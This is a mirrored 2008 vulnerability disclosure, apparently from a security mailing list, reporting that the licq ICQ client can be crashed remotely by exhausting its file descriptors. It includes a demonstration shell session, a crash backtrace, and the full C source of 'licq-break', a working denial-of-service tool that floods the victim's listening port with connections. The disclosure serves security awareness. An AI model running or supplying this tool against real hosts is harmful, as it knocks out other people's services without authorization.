Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19607
HistoryApr 10, 2008 - 12:00 a.m.

licq remote DoS?

2008-04-1000:00:00
vulners.com
16
JSON

Hello,

Licq is a linux qt-based ICQ client. There is a vulnerability in the way
licq processes new incoming TCP connections which can be exploited by a
remote attacker to crash the client.

When executed, licq opens a listening socket at a random port (AFAIK
between 30000 and 65000). There is no host-based authentication and any
remote host can connect to it. Those connections are not closed by licq
after a given timeout period.

When all possible open file descriptors are exhausted (they are limited
to 1024 for non-root users in most linux installations /ulimit -n/), a
new incoming TCP connection causes licq to crash.

Here is some example:

We run licq:
gat3way@gat3way:~$ licq

from another console, we find out the port licq is listening to (we'd
need to portscan if the target is on a remote system):

gat3way@gat3way:/tmp$ lsof |grep licq|grep LISTEN
licq 10783 gat3way 9u IPv4 35993218 TCP
*:52259 (LISTEN)

Now we run our "evil" denial of service code:
gat3way@gat3way:/tmp$ ./licq-break 127.0.0.1 52259
ip=127.0.0.1
done!

and go back to the console on which we ran licq…oops…

Licq Segmentation Violation Detected.
Backtrace (saved in /home/gat3way/.licq//licq.backtrace):
licq(licq_handle_sigabrt+0x2b4) [0x80f68d4]
[0xffffe420]
/lib/libc.so.6(abort+0x101) [0xb7b17811]
licq [0x80f6b1d]
[0xffffe420]
licq(_Z18MonitorSockets_tepPv+0x3ca) [0x80c907a]
/lib/libpthread.so.0 [0xb7d9e383]
/lib/libc.so.6(clone+0x5e) [0xb7bc173e]
Attempting to generate core file.
…

The source of licq-break (nothing particular, just connects MAX sockets
to a certain port at the victim's host):

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

// change to suit your needs
#define MAX 1024

int fds[MAX];

int main(int argc, char *argv[])
{
int port,a;
char host[12];
struct sockaddr_in victim;
struct in_addr inp;

if &#40;argc!=3&#41;
{
    printf&#40;&quot;usage: &#37;s &lt;ip&gt; &lt;port&gt;&#92;n&quot;,argv[0]&#41;;
    exit&#40;1&#41;;
}

port=atoi&#40;argv[2]&#41;;
strcpy&#40;host,argv[1]&#41;;
printf&#40;&quot;ip=&#37;s&#92;n&quot;,host&#41;;

for &#40;a=1;a&lt;=MAX;a++&#41;
{
    fds[a]=socket&#40;PF_INET,SOCK_STREAM,0&#41;;
    victim.sin_family= AF_INET;
    victim.sin_port=htons&#40;port&#41;;
    inet_aton&#40;host,&amp;victim.sin_addr&#41;;
    connect&#40;fds[a],&amp;victim,sizeof&#40;victim&#41;&#41;;
}

printf&#40;&quot;done!&quot;&#41;;

}

JSON